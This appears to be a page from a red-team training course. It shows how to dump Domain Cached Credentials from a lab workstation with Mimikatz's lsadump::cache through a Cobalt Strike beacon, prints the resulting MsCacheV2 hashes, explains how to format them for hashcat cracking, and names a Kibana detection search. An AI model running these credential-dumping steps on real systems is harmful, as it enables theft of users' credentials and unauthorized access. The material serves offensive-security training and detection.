Domain Cached Credentials

Domain Cached Credentials (DCC) were designed for situations where domain credentials are needed to log on to a machine even while it is disconnected from the domain (think of a roaming laptop, for example). The local device caches the domain credentials so authentication can happen locally, but these cached values can be extracted and cracked offline to recover plaintext credentials.

Unfortunately, the hash format is not NTLM so it can't be used with pass the hash. The only viable use for these is to crack them offline.

The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.

This command requires elevated privileges.


beacon> mimikatz !lsadump::cache

Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a

Local name : WKSTN-2 ( S-1-5-21-2281971671-4135076198-2136761646 )
Domain name : DEV ( S-1-5-21-569305411-121244042-2357301523 )
Domain FQDN : dev.cyberbotic.io

Policy subsystem is : 1.18
LSA Key(s) : 1, default {9f88abd7-1cb9-d741-372b-c883b3cbf843}
  [00] {9f88abd7-1cb9-d741-372b-c883b3cbf843} c38164900449d2c6d81b557198ab0cbda2c0ce1c9f57c717cb221032ba1adffb

* Iteration is set to default (10240)

[NL$1 - 9/1/2022 8:10:06 AM]
RID       : 00000450 (1104)
User      : DEV\bfarmer
MsCacheV2 : 98e6eec9c0ce004078a48d4fd03f2419

[NL$2 - 9/1/2022 10:29:19 AM]
RID       : 00000451 (1105)
User      : DEV\jking
MsCacheV2 : 0d50dee9ed3f29d00282168297090d2a


To crack these with hashcat, we need to transform them into the format hashcat expects. The hashcat example hashes page shows that it should be $DCC2$<iterations>#<username>#<hash>.

DCC is orders of magnitude slower to crack than NTLM.

OPSEC: This module will open a handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle" saved search in Kibana to see them.

